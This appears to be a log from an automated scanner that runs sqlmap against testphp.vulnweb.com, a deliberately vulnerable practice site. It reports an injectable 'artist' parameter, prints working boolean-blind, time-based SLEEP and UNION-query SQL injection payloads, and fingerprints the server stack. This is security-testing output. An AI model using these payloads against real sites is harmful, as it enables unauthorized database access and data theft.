2023-02-08 09:07:04,287 -                                                           SUMMARY                                         





     
2023-02-08 09:07:06,545 - [*] Target is alive :  testphp.vulnweb.com
2023-02-08 09:07:07,036 - 
	[+] SQL Injection vulnerability detected, link:http://testphp.vulnweb.com/artists.php?artist=1"
2023-02-08 09:07:07,036 - 
	[*] start Further Analysis on the target: http://testphp.vulnweb.com/artists.php?artist=1"
2023-02-08 09:07:08,522 - 	[*] starting @ 05:21:10 /2023-02-07/

2023-02-08 09:07:08,522 - 	[*]

2023-02-08 09:07:08,522 - 	[*][05:21:10] [INFO] resuming back-end DBMS 'mysql' 

2023-02-08 09:07:08,522 - 	[*][05:21:10] [INFO] testing connection to the target URL

2023-02-08 09:07:08,522 - 	[*]sqlmap resumed the following injection point(s) from stored session:

2023-02-08 09:07:08,522 - 	[*]---

2023-02-08 09:07:08,522 - 	[*]Parameter: artist (GET)

2023-02-08 09:07:08,522 - 	[*]    Type: boolean-based blind

2023-02-08 09:07:08,522 - 	[*]    Title: AND boolean-based blind - WHERE or HAVING clause

2023-02-08 09:07:08,522 - 	[*]    Payload: artist=1 AND 2826=2826

2023-02-08 09:07:08,523 - 	[*]

2023-02-08 09:07:08,523 - 	[*]    Type: time-based blind

2023-02-08 09:07:08,523 - 	[*]    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

2023-02-08 09:07:08,523 - 	[*]    Payload: artist=1 AND (SELECT 7839 FROM (SELECT(SLEEP(5)))Rlld)

2023-02-08 09:07:08,523 - 	[*]

2023-02-08 09:07:08,523 - 	[*]    Type: UNION query

2023-02-08 09:07:08,523 - 	[*]    Title: Generic UNION query (NULL) - 3 columns

2023-02-08 09:07:08,523 - 	[*]    Payload: artist=-9289 UNION ALL SELECT NULL,NULL,CONCAT(0x7171707871,0x6c6d5a58595866706f44546c465a70754f6c647a624f524972694f776863466856474a5170464466,0x716b706a71)-- -

2023-02-08 09:07:08,523 - 	[*]---

2023-02-08 09:07:08,523 - 	[*][05:21:11] [INFO] the back-end DBMS is MySQL

2023-02-08 09:07:08,523 - 	[*]web server operating system: Linux Ubuntu

2023-02-08 09:07:08,523 - 	[*]web application technology: PHP 5.6.40, Nginx 1.19.0

2023-02-08 09:07:08,523 - 	[*]back-end DBMS: MySQL >= 5.0.12

2023-02-08 09:07:08,523 - 	[*][05:21:11] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

2023-02-08 09:07:08,523 - 	[*][05:21:11] [WARNING] your sqlmap version is outdated

2023-02-08 09:07:08,523 - 	[*]

2023-02-08 09:07:08,523 - 	[*] ending @ 05:21:11 /2023-02-07/

